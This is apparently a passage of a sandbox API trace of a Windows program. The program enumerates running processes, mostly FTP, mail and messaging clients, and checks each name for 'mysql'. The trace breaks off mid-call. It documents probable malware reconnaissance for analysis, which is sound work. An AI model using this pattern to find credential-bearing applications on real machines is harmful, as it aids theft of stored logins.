[0177.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3595cc8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0177.367] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0177.367] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="mysql") returned 0x0 [0177.367] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0177.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.368] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35819b8 [0177.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x35819b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0177.368] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0177.368] StrStrIA (lpFirst="alftp.exe", lpSrch="mysql") returned 0x0 [0177.368] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0177.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.369] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35818f8 [0177.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x35818f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0177.369] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0177.369] StrStrIA (lpFirst="barca.exe", lpSrch="mysql") returned 0x0 [0177.369] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0177.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.371] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581a00 [0177.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3581a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0177.372] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0177.372] StrStrIA (lpFirst="bitkinex.exe", lpSrch="mysql") returned 0x0 [0177.372] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0177.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.374] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35819d0 [0177.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35819d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0177.374] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0177.374] StrStrIA (lpFirst="coreftp.exe", lpSrch="mysql") returned 0x0 [0177.374] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0177.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0177.375] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3586ad0 [0177.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3586ad0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0177.375] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0177.375] StrStrIA (lpFirst="far.exe", lpSrch="mysql") returned 0x0 [0177.375] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0177.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.376] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3581aa8 [0177.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3581aa8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0177.377] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0177.377] StrStrIA (lpFirst="filezilla.exe", lpSrch="mysql") returned 0x0 [0177.377] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0177.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.379] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581a78 [0177.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3581a78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0177.379] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0177.379] StrStrIA (lpFirst="flashfxp.exe", lpSrch="mysql") returned 0x0 [0177.379] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0177.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.380] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3581a60 [0177.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3581a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0177.380] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0177.380] StrStrIA (lpFirst="fling.exe", lpSrch="mysql") returned 0x0 [0177.380] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0177.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0177.381] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3595ae8 [0177.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3595ae8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0177.381] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0177.381] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="mysql") returned 0x0 [0177.382] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0177.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.383] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595c68 [0177.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3595c68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0177.383] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0177.383] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="mysql") returned 0x0 [0177.383] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0177.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0177.384] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3586a70 [0177.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3586a70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0177.384] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0177.384] StrStrIA (lpFirst="icq.exe", lpSrch="mysql") returned 0x0 [0177.384] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0177.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.386] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581868 [0177.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3581868, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0177.386] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0177.386] StrStrIA (lpFirst="leechftp.exe", lpSrch="mysql") returned 0x0 [0177.386] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0177.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.387] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3581ad8 [0177.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3581ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0177.387] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0177.387] StrStrIA (lpFirst="ncftp.exe", lpSrch="mysql") returned 0x0 [0177.387] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0177.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.388] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35817f0 [0177.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x35817f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0177.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0177.388] StrStrIA (lpFirst="notepad.exe", lpSrch="mysql") returned 0x0 [0177.388] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0177.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.389] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3581808 [0177.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3581808, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0177.389] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0177.389] StrStrIA (lpFirst="operamail.exe", lpSrch="mysql") returned 0x0 [0177.390] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0177.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.390] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581a18 [0177.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3581a18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0177.391] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0177.391] StrStrIA (lpFirst="pidgin.exe", lpSrch="mysql") returned 0x0 [0177.391] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0177.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.392] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3581820 [0177.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3581820, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0177.392] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0177.392] StrStrIA (lpFirst="scriptftp.exe", lpSrch="mysql") returned 0x0 [0177.392] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0177.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.393] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3581898 [0177.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3581898, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0177.393] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0177.393] StrStrIA (lpFirst="skype.exe", lpSrch="mysql") returned 0x0 [0177.393] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0177.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.394] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581a90 [0177.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3581a90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0177.394] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0177.394] StrStrIA (lpFirst="smartftp.exe", lpSrch="mysql") returned 0x0 [0177.394] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0177.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.395] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581a30 [0177.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x3581a30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0177.395] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0177.395] StrStrIA (lpFirst="totalcmd.exe", lpSrch="mysql") returned 0x0 [0177.395] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0177.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.428] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581910 [0177.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3581910, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0177.428] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0177.428] StrStrIA (lpFirst="trillian.exe", lpSrch="mysql") returned 0x0 [0177.429] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0177.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.430] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581928 [0177.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3581928, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0177.430] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0177.430] StrStrIA (lpFirst="webdrive.exe", lpSrch="mysql") returned 0x0 [0177.430] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0177.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.431] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581940 [0177.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", 